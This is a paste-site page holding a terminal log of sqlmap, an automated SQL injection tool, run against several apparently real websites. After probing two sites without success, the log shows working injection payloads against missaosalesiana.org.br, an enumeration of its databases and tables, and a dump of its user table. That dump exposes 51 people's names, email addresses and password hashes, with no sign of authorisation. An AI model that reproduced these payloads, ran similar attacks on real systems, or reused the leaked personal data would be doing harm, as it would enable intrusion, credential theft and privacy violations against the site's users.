View difference between Paste ID: 8NmZmA9J and 4aYzpfQg
SHOW: | | - or go back to the newest paste.
1
Usage: python sqlmap [options]
2
3
Options:
4
  -h, --help            Show basic help message and exit
5
  -hh                   Show advanced help message and exit
6
  --version             Show program's version number and exit
7
  -v VERBOSE            Verbosity level: 0-6 (default 1)
8
9
  Target:
10
    At least one of these options has to be provided to set the target(s)
11
12
    -u URL, --url=URL   Target URL (e.g. "www.target.com/vuln.php?id=1")
13
    -g GOOGLEDORK       Process Google dork results as target URLs
14
15
  Request:
16
    These options can be used to specify how to connect to the target URL
17
18
    --data=DATA         Data string to be sent through POST
19
    --cookie=COOKIE     HTTP Cookie header
20
    --random-agent      Use randomly selected HTTP User-Agent header
21
    --proxy=PROXY       Use a proxy to connect to the target URL
22
    --tor               Use Tor anonymity network
23
    --check-tor         Check to see if Tor is used properly
24
25
  Injection:
26
    These options can be used to specify which parameters to test for,
27
    provide custom injection payloads and optional tampering scripts
28
29
    -p TESTPARAMETER    Testable parameter(s)
30
    --dbms=DBMS         Force back-end DBMS to this value
31
32
  Detection:
33
    These options can be used to customize the detection phase
34
35
    --level=LEVEL       Level of tests to perform (1-5, default 1)
36
    --risk=RISK         Risk of tests to perform (0-3, default 1)
37
38
  Techniques:
39
    These options can be used to tweak testing of specific SQL injection
40
    techniques
41
42
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
43
44
  Enumeration:
45
    These options can be used to enumerate the back-end database
46
    management system information, structure and data contained in the
47
    tables. Moreover you can run your own SQL statements
48
49
    -a, --all           Retrieve everything
50
    -b, --banner        Retrieve DBMS banner
51
    --current-user      Retrieve DBMS current user
52
    --current-db        Retrieve DBMS current database
53
    --passwords         Enumerate DBMS users password hashes
54
    --tables            Enumerate DBMS database tables
55
    --columns           Enumerate DBMS database table columns
56
    --schema            Enumerate DBMS schema
57
    --dump              Dump DBMS database table entries
58
    --dump-all          Dump all DBMS databases tables entries
59
    -D DB               DBMS database to enumerate
60
    -T TBL              DBMS database table(s) to enumerate
61
    -C COL              DBMS database table column(s) to enumerate
62
63
  Operating system access:
64
    These options can be used to access the back-end database management
65
    system underlying operating system
66
67
    --os-shell          Prompt for an interactive operating system shell
68
    --os-pwn            Prompt for an OOB shell, meterpreter or VNC
69
70
  General:
71
    These options can be used to set some general working parameters
72
73
    --batch             Never ask for user input, use the default behaviour
74
    --flush-session     Flush session files for current target
75
76
  Miscellaneous:
77
    --wizard            Simple wizard interface for beginner users
78
79
[!] to see full list of options run with '-hh'
80
81
[*] shutting down at 12:42:18
82
83
root@kali:~# sqlmap --url "http://www.tribunaldenoticia.com/noticias/noticia.php?id=217" --dbs
84
85
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
86
    http://sqlmap.org
87
88
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
89
90
[*] starting at 12:43:18
91
92
[12:43:18] [INFO] testing connection to the target URL
93
[12:43:18] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
94
[12:43:18] [INFO] testing if the target URL is stable. This can take a couple of seconds
95
[12:43:20] [INFO] target URL is stable
96
[12:43:20] [INFO] testing if GET parameter 'id' is dynamic
97
[12:43:20] [WARNING] GET parameter 'id' does not appear dynamic
98
[12:43:20] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
99
[12:43:20] [INFO] testing for SQL injection on GET parameter 'id'
100
[12:43:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
101
[12:43:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
102
[12:43:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
103
[12:43:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
104
[12:43:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
105
[12:43:27] [INFO] testing 'MySQL inline queries'
106
[12:43:27] [INFO] testing 'PostgreSQL inline queries'
107
[12:43:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
108
[12:43:28] [INFO] testing 'Oracle inline queries'
109
[12:43:28] [INFO] testing 'SQLite inline queries'
110
[12:43:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
111
[12:43:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
112
[12:43:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
113
[12:43:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
114
[12:43:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
115
[12:43:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
116
[12:43:35] [INFO] testing 'Oracle AND time-based blind'
117
[12:43:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
118
[12:43:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
119
[12:43:50] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
120
[12:44:01] [WARNING] GET parameter 'id' is not injectable
121
[12:44:01] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
122
[12:44:01] [WARNING] HTTP error codes detected during run:
123
403 (Forbidden) - 225 times
124
125
[*] shutting down at 12:44:01
126
127
root@kali:~# sqlmap --url "http://www.agenciaaids.com.br/artigos/interna.php?id=447" --dbs
128
129
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
130
    http://sqlmap.org
131
132
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
133
134
[*] starting at 12:45:10
135
136
[12:45:11] [INFO] testing connection to the target URL
137
[12:45:11] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
138
[12:45:11] [INFO] testing if the target URL is stable. This can take a couple of seconds
139
[12:45:12] [INFO] target URL is stable
140
[12:45:12] [INFO] testing if GET parameter 'id' is dynamic
141
[12:45:12] [WARNING] GET parameter 'id' does not appear dynamic
142
[12:45:13] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
143
[12:45:13] [INFO] testing for SQL injection on GET parameter 'id'
144
[12:45:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
145
[12:45:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
146
[12:45:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
147
[12:45:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
148
[12:45:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
149
[12:45:21] [INFO] testing 'MySQL inline queries'
150
[12:45:21] [INFO] testing 'PostgreSQL inline queries'
151
[12:45:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
152
[12:45:21] [INFO] testing 'Oracle inline queries'
153
[12:45:21] [INFO] testing 'SQLite inline queries'
154
[12:45:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
155
[12:45:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
156
[12:45:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
157
[12:45:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
158
[12:45:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
159
[12:45:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
160
[12:45:30] [INFO] testing 'Oracle AND time-based blind'
161
[12:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
162
[12:45:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
163
[12:45:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
164
[12:45:59] [WARNING] GET parameter 'id' is not injectable
165
[12:45:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
166
[12:45:59] [WARNING] HTTP error codes detected during run:
167
403 (Forbidden) - 238 times
168
169
[*] shutting down at 12:45:59
170
171
root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" --dbs
172
173
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
174
    http://sqlmap.org
175
176
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
177
178
[*] starting at 12:46:25
179
180
[12:46:26] [INFO] testing connection to the target URL
181
[12:46:26] [INFO] testing if the target URL is stable. This can take a couple of seconds
182
[12:46:27] [INFO] target URL is stable
183
[12:46:27] [INFO] testing if GET parameter 'id' is dynamic
184
[12:46:27] [INFO] confirming that GET parameter 'id' is dynamic
185
[12:46:28] [WARNING] GET parameter 'id' does not appear dynamic
186
[12:46:28] [INFO] testing for SQL injection on GET parameter 'id'
187
[12:46:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
188
[12:46:28] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
189
[12:46:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
190
[12:46:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
191
[12:46:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
192
[12:46:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
193
[12:46:30] [INFO] testing 'MySQL inline queries'
194
[12:46:31] [INFO] testing 'PostgreSQL inline queries'
195
[12:46:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
196
[12:46:31] [INFO] testing 'Oracle inline queries'
197
[12:46:31] [INFO] testing 'SQLite inline queries'
198
[12:46:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
199
[12:46:31] [WARNING] time-based comparison requires larger statistical model, please wait.....
200
[12:46:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
201
[12:46:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
202
[12:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
203
[12:47:32] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
204
[12:47:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
205
[12:47:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
206
[12:47:33] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
207
[12:47:34] [INFO] target URL appears to have 4 columns in query
208
[12:47:34] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
209
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
210
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
211
---
212
Place: GET
213
Parameter: id
214
    Type: boolean-based blind
215
    Title: AND boolean-based blind - WHERE or HAVING clause
216
    Payload: id=1 AND 1964=1964
217
218
    Type: UNION query
219
    Title: MySQL UNION query (NULL) - 4 columns
220
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
221
222
    Type: AND/OR time-based blind
223
    Title: MySQL > 5.0.11 AND time-based blind
224
    Payload: id=1 AND SLEEP(5)
225
---
226
[12:47:36] [INFO] the back-end DBMS is MySQL
227
web application technology: Apache
228
back-end DBMS: MySQL 5.0.11
229
[12:47:36] [INFO] fetching database names
230
available databases [2]:
231
[*] information_schema
232
[*] painelflex03
233
234
[12:47:36] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
235
236
[*] shutting down at 12:47:36
237
238
root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03
239
240
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
241
    http://sqlmap.org
242
243
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
244
245
[*] starting at 12:47:50
246
247
[12:47:50] [INFO] resuming back-end DBMS 'mysql' 
248
[12:47:50] [INFO] testing connection to the target URL
249
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
250
---
251
Place: GET
252
Parameter: id
253
    Type: boolean-based blind
254
    Title: AND boolean-based blind - WHERE or HAVING clause
255
    Payload: id=1 AND 1964=1964
256
257
    Type: UNION query
258
    Title: MySQL UNION query (NULL) - 4 columns
259
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
260
261
    Type: AND/OR time-based blind
262
    Title: MySQL > 5.0.11 AND time-based blind
263
    Payload: id=1 AND SLEEP(5)
264
---
265
[12:47:50] [INFO] the back-end DBMS is MySQL
266
web application technology: Apache
267
back-end DBMS: MySQL 5.0.11
268
[12:47:50] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
269
270
[*] shutting down at 12:47:50
271
272
root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03 --tables
273
274
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
275
    http://sqlmap.org
276
277
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
278
279
[*] starting at 12:47:53
280
281
[12:47:54] [INFO] resuming back-end DBMS 'mysql' 
282
[12:47:54] [INFO] testing connection to the target URL
283
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
284
---
285
Place: GET
286
Parameter: id
287
    Type: boolean-based blind
288
    Title: AND boolean-based blind - WHERE or HAVING clause
289
    Payload: id=1 AND 1964=1964
290
291
    Type: UNION query
292
    Title: MySQL UNION query (NULL) - 4 columns
293
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
294
295
    Type: AND/OR time-based blind
296
    Title: MySQL > 5.0.11 AND time-based blind
297
    Payload: id=1 AND SLEEP(5)
298
---
299
[12:47:54] [INFO] the back-end DBMS is MySQL
300
web application technology: Apache
301
back-end DBMS: MySQL 5.0.11
302
[12:47:54] [INFO] fetching tables for database: 'painelflex03'
303
Database: painelflex03
304
[62 tables]
305
+------------------------------------+
306
| cid_obras                          |
307
| cidade                             |
308
| encontro_irmaos                    |
309
| jornada_salesiana                  |
310
| mat_backup                         |
311
| obras                              |
312
| sem_missionario                    |
313
| uf                                 |
314
| w83__excl_proib                    |
315
| w83__exclusao                      |
316
| w83_anuario                        |
317
| w83_anuario_anuario_funcao         |
318
| w83_anuario_falecio                |
319
| w83_anuario_funcao                 |
320
| w83_anuario_governo                |
321
| w83_anuario_governo_nive           |
322
| w83_anuario_governo_nivel          |
323
| w83_anuario_obra                   |
324
| w83_anuario_obra_anuario_obra_ativ |
325
| w83_anuario_obra_ativ              |
326
| w83_banner                         |
327
| w83_banner_cat                     |
328
| w83_banner_stats                   |
329
| w83_chamado_interacaow83           |
330
| w83_chamado_tipow83                |
331
| w83_chamadow83                     |
332
| w83_colaborador                    |
333
| w83_contadorw83                    |
334
| w83_contato                        |
335
| w83_contato_dest                   |
336
| w83_enquete                        |
337
| w83_enquete_resps                  |
338
| w83_enquete_resps_votos            |
339
| w83_evento                         |
340
| w83_ferramenta_campo               |
341
| w83_galeria                        |
342
| w83_galeria_cat                    |
343
| w83_galeria_fotos                  |
344
| w83_grupo                          |
345
| w83_grupo_assessor                 |
346
| w83_grupo_ident                    |
347
| w83_hotsite                        |
348
| w83_inspetor                       |
349
| w83_mail_em_grw83                  |
350
| w83_mail_emw83                     |
351
| w83_mail_enviow83                  |
352
| w83_mailw83                        |
353
| w83_mat                            |
354
| w83_mat_cat                        |
355
| w83_mat_sub                        |
356
| w83_materia                        |
357
| w83_materia_cat                    |
358
| w83_materia_coment                 |
359
| w83_materia_sub                    |
360
| w83_projeto                        |
361
| w83_revista_fotos                  |
362
| w83_trilha                         |
363
| w83_trilha_album                   |
364
| w83_usuario                        |
365
| w83_usuario_ferramenta             |
366
| w83_video                          |
367
| w83_video_cat                      |
368
+------------------------------------+
369
370
[12:47:54] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
371
372
[*] shutting down at 12:47:54
373
374
root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03 -T w83_usuario --dump
375
376
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
377
    http://sqlmap.org
378
379
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
380
381
[*] starting at 12:48:37
382
383
[12:48:38] [INFO] resuming back-end DBMS 'mysql' 
384
[12:48:38] [INFO] testing connection to the target URL
385
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
386
---
387
Place: GET
388
Parameter: id
389
    Type: boolean-based blind
390
    Title: AND boolean-based blind - WHERE or HAVING clause
391
    Payload: id=1 AND 1964=1964
392
393
    Type: UNION query
394
    Title: MySQL UNION query (NULL) - 4 columns
395
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
396
397
    Type: AND/OR time-based blind
398
    Title: MySQL > 5.0.11 AND time-based blind
399
    Payload: id=1 AND SLEEP(5)
400
---
401
[12:48:38] [INFO] the back-end DBMS is MySQL
402
web application technology: Apache
403
back-end DBMS: MySQL 5.0.11
404
[12:48:38] [INFO] fetching columns for table 'w83_usuario' in database 'painelflex03'
405
[12:48:38] [INFO] fetching entries for table 'w83_usuario' in database 'painelflex03'
406
[12:48:38] [INFO] analyzing table dump for possible password hashes
407
Database: painelflex03
408
Table: w83_usuario
409
[51 entries]
410
+----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
411
| id | nome                                        | sexo | nivel | email                                       | senha           | empresa     | a_atual             | bloqueado | a_anterior          |
412
+----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
413
| 1  | \xcanio Chaves Carvalho                     | M    | 4     | enio@digitalmt.com.br                       | 9d962b8164d7b6a | Digital Art | 2012-01-17 14:43:43 | NULL      | 2012-01-13 17:07:01 |
414
| 2  | Fl\xe1dima Christofari                      | F    | 3     | comunicacao@missaosalesiana.org.br          | af197920dc701ec | <blank>     | 2012-01-27 17:38:51 | NULL      | 2012-01-27 14:58:05 |
415
| 3  | Maur\xedcio Mendes Ortiz                    | M    | 3     | mauricio@msmt.org.br                        | 60b43f3afe7757f | <blank>     | 2009-08-18 09:38:00 | NULL      | 2009-07-27 11:54:12 |
416
| 56 | \xcanio                                     | M    | 4     | enio@pop.com.br                             | 2eb96c1d43b53b2 | <blank>     | 2011-12-08 12:46:11 | NULL      | 2011-10-13 09:30:17 |
417
| 6  | Recep\xe7\xe3o                              | F    | 3     | recepcao@missaosalesiana.org.br             | ed95e52762ab7bf | <blank>     | 2011-08-09 08:12:56 | NULL      | 2011-08-07 19:41:41 |
418
| 59 | Gilmar Vieira                               | M    | 2     | ajs@missaosalesiana.org.br                  | 24aa901725e42b2 | <blank>     | 2011-12-13 15:12:13 | NULL      | 2011-12-13 15:12:12 |
419
| 8  | L\xfadio da Silva                           | M    | 2     | ludio@cdb.br                                | e2fef250410c520 | <blank>     | 2012-01-27 08:42:11 | NULL      | 2011-12-01 16:46:36 |
420
| 9  | Patricia Geovana da Silva Brito             | F    | 2     | patriciageovanna05@hotmail.com              | 436f2d10ecd8d57 | <blank>     | 2012-01-26 15:35:28 | NULL      | 2011-12-13 11:33:53 |
421
| 49 | Mauri Silvestre do Couto                    | M    | 2     | cpd@colegiosale.com.br                      | 78b1045c6aea2b4 | <blank>     | 2011-04-13 08:55:45 | NULL      | 2011-04-13 08:13:43 |
422
| 13 | Osmar Orotides de Resende                   | M    | 2     | osmaresende@hotmail.com                     | 3f9a3a5699e961c | <blank>     | 2009-08-27 10:06:16 | NULL      | NULL                |
423
| 14 | Marcel Silvestre do Couto                   | M    | 2     | marcelcouto@gmail.com                       | 1d35346825a6bda | <blank>     | 2010-03-01 20:12:55 | NULL      | 2010-03-01 09:50:04 |
424
| 15 | Alysson Jos\xe9 de Paula Silva              | M    | 2     | pastoral.cj-tl@missaosalesiana.org.br       | b08fab69aece1a4 | <blank>     | 2011-10-24 12:40:07 | NULL      | 2011-10-24 11:30:22 |
425
| 16 | Silvia Tada                                 | F    | 2     | silvia@ucdb.br                              | 382558c9ee44f7b | <blank>     | 2011-01-24 14:37:25 | NULL      | 2010-12-21 11:20:59 |
426
| 17 | Jakson Pereira                              | M    | 2     | jakson@ucdb.br                              | eaeb158b398c40a | <blank>     | 2010-11-25 16:44:43 | NULL      | 2010-10-26 16:10:20 |
427
| 18 | Cleuza Maria Loubet Cardoso                 | F    | 2     | assistencia.social@missaosalesiana.org.br   | 36cdb2d2d5b5395 | <blank>     | 2011-08-07 19:24:04 | NULL      | 2009-12-01 09:12:53 |
428
| 19 | Denise Regina Rosa Barbosa                  | F    | 2     | juridico@missaosalesiana.org.br             | fa5ffc337a8a2fc | <blank>     | 2011-08-07 19:31:47 | NULL      | 2009-12-29 14:13:07 |
429
| 20 | Maikon Luis Malaquias                       | M    | 2     | comunica@salesiano-ata.br                   | 37e13c25f1ea5a8 | <blank>     | 2012-01-20 16:52:09 | NULL      | 2012-01-16 09:07:10 |
430
| 36 | Ampare                                      | M    | 2     | coordenador.ampare@missaosalesiana.org.br   | d39b0d566e13c16 | <blank>     | 2011-04-28 09:56:43 | NULL      | 2011-04-28 09:48:16 |
431
| 22 | Tatiana Ri\xe7a                             | F    | 2     | tati.rica@hotmail.com                       | fdcea02e881bcc5 | <blank>     | 2009-09-14 18:22:09 | NULL      | 2009-09-14 17:56:24 |
432
| 52 | Wellington Aguilar M. Proen\xe7a            | M    | 2     | wamp@santuariomariaauxiliadora.com.br       | ae23953b9e61db8 | <blank>     | 2011-08-07 19:37:43 | NULL      | 2011-06-25 12:13:41 |
433
| 24 | Luiz Felipe de Souza Jimenez                | M    | 2     | lipe2301@hotmail.com                        | 161237d66b8095a | <blank>     | 2011-11-18 08:59:54 | NULL      | 2011-11-17 09:28:40 |
434
| 25 | Marcelo de Oliveira Pereira                 | M    | 2     | mop.marcelo@gmail.com                       | e709109241e8f02 | <blank>     | 2011-07-28 17:00:20 | NULL      | 2011-07-27 16:13:46 |
435
| 26 | Angelo C\xe9sar Cenerin                     | F    | 2     | angelo@centrojuvenil.org.br                 | 04efb69af00d458 | <blank>     | 2012-01-13 20:08:09 | NULL      | 2011-08-05 19:13:01 |
436
| 27 | Tamiris Riani Silv\xe9rio de Souza          | F    | 2     | tamirissouza@cssg.g12.br                    | e1cb45714c61f62 | <blank>     | 2011-05-10 09:03:23 | NULL      | 2009-12-15 15:22:17 |
437
| 28 | Tarley da Guia Nunes da Mata                | M    | 2     | tirowa@gmail.com                            | 689ea35f534c3ec | <blank>     | 2011-08-07 19:40:27 | NULL      | 2010-09-08 00:13:41 |
438
| 30 | Ros\xe2ngela Concei\xe7\xe3o Rodrigues Dias | F    | 2     | rengeldias1@hotmail.com                     | e8a354b6dfe18cc | <blank>     | 2009-09-23 22:25:47 | NULL      | 2009-09-23 18:22:47 |
439
| 50 | Jo\xe3o Antonio Madalosso J\xfanior         | M    | 2     | madalosso@missaosalesiana.org.br            | 6a73691f33cf775 | <blank>     | 2011-02-02 09:01:03 | NULL      | 2011-02-02 08:56:46 |
440
| 51 | Carlos Eduardo Rodrigues Or\xe1cio          | M    | 3     | comunicacao08@missaosalesiana.org.br        | 1600dce77266877 | <blank>     | 2012-01-13 13:53:03 | NULL      | 2012-01-13 00:04:35 |
441
| 33 | Vanderson de Souza Gomes                    | M    | 2     | vanderson@missaosalesiana.org.br            | df026689d7cc2db | <blank>     | 2011-01-13 15:49:10 | NULL      | 2011-01-13 15:35:18 |
442
| 35 | Israel Rafael Esp\xedndola                  | M    | 2     | comunicacaopsjb@hotmail.com                 | 8551f127f09a851 | <blank>     | 2011-08-05 19:42:27 | NULL      | 2010-03-31 10:33:00 |
443
| 37 | Luiz Fernando Southier                      | M    | 2     | luizsouthier@gmail.com                      | 39bf05d429d67f0 | <blank>     | 2011-02-10 09:24:35 | NULL      | 2010-10-18 11:29:27 |
444
| 40 | Euller da Silva                             | M    | 2     | euller@missaosalesiana.org.br               | 634425147a31e0d | <blank>     | 2010-08-23 17:17:29 | NULL      | 2010-05-28 09:45:42 |
445
| 41 | Vera L\xfacia Desmarest                     | F    | 2     | assistencia.social05@missaosalesiana.org.br | d0150f46158c321 | <blank>     | 2011-08-07 19:38:57 | NULL      | 2010-04-26 14:55:39 |
446
| 42 | Matheus Lima                                | M    | 2     | matheuslima22@msn.com                       | ea1721f70e71839 | <blank>     | 2011-09-30 09:58:47 | NULL      | 2011-09-30 09:00:54 |
447
| 43 | Mateus Rezende                              | M    | 2     | mateusrezende.mr@gmail.com                  | 3f883b91bb3195d | <blank>     | 2010-06-22 16:31:26 | NULL      | 2010-06-22 16:31:26 |
448
| 45 | Mestre Teixeira                             | M    | 3     | economo@missaosalesiana.org.br              | 909adc1236579a6 | <blank>     | 2010-07-10 11:23:55 | NULL      | 2010-07-10 11:20:50 |
449
| 46 | Jos\xe9 Marcos de Oliveira                  | M    | 2     | josemarcos@missaosalesiana.org.br           | eac0874f66d9bb7 | <blank>     | 2010-08-05 18:37:52 | NULL      | 2010-07-28 08:42:00 |
450
| 47 | Rafael Zanata Albertini                     | M    | 2     | rafaelalbertini@missaosalesiana.org.br      | e2e60b4317bb269 | <blank>     | 2012-01-13 23:09:33 | NULL      | 2011-01-28 09:31:28 |
451
| 48 | Jo\xe3o Vitor Aparecido Ortiz               | M    | 2     | joaovitor@missaosalesiana.org.br            | bb5255787864b25 | <blank>     | 2011-08-07 19:34:12 | NULL      | 2010-11-04 16:46:37 |
452
| 53 | Wilson Roberto Marques                      | M    | 2     | wilson@cssg.g12.br                          | 2d79f9ba9015f03 | <blank>     | 2011-12-13 10:19:24 | NULL      | 2011-12-12 11:10:38 |
453
| 57 | Silvio Andrade                              | M    | 2     | silviopress@terra.com.br                    | 1d7a7c6b50b4f8e | <blank>     | 2011-05-30 15:12:05 | NULL      | NULL                |
454
| 55 | Augusto Rodrigues de Souza                  | M    | 2     | augusto@missaosalesiana.org.br              | 42a4b2e7ba0d96f | <blank>     | 2011-12-05 14:36:29 | NULL      | 2011-11-24 17:50:17 |
455
| 58 | Me. Stivanelli                              | M    | 2     | rafaelcaldato@missaosalesiana.org.br        | d8f837c19d628de | <blank>     | 2011-11-03 10:47:05 | NULL      | 2011-10-22 19:16:26 |
456
| 60 | Diego Henrique Franco                       | M    | 2     | tecnologia@missaosalesiana.org.br           | 2e75310a0c95ca2 | <blank>     | NULL                | NULL      | NULL                |
457
| 63 | Marcelo Uenaka                              | M    | 2     | marketing@unisalesiano.edu.br               | 1f7acd2e6e1fe1f | <blank>     | NULL                | NULL      | NULL                |
458
| 61 | Rakel Faria Ferreira                        | F    | 2     | rakelfferreira@gmail.com                    | 89794b621a313bb | <blank>     | NULL                | NULL      | NULL                |
459
| 62 | Rafael Gustavo Santos Souza Lopes           | M    | 2     | rafaelgustav@hotmail.com                    | 89794b621a313bb | <blank>     | NULL                | NULL      | NULL                |
460
| 64 | Fl\xe1dima Christofari                      | F    | 2     | fladimachristofari@gmail.com                | cbbbd598cd1c284 | <blank>     | NULL                | NULL      | NULL                |
461
| 65 | P Jo\xe3o Marcos Ara\xfajo Ramos            | M    | 2     | joaoramos@missaosalesiana.org.br            | 89794b621a313bb | <blank>     | NULL                | NULL      | NULL                |
462
| 66 | Jo\xe3o Marcos de Ara\xfajo Ramos           | M    | 2     | joaomarcos@missaosalesiana.org.br           | 89794b621a313bb | <blank>     | NULL                | NULL      | NULL                |
463
| 67 | Tarley da Mata                              | M    | 1     | tarley@missaosalesiana.org.br               | cffc2e8269d1758 | <blank>     | NULL                | NULL      | NULL                |
464
+----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
465
466
[12:48:38] [INFO] table 'painelflex03.w83_usuario' dumped to CSV file '/usr/share/sqlmap/output/www.missaosalesiana.org.br/dump/painelflex03/w83_usuario.csv'
467
[12:48:38] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
468
469
[*] shutting down at 12:48:38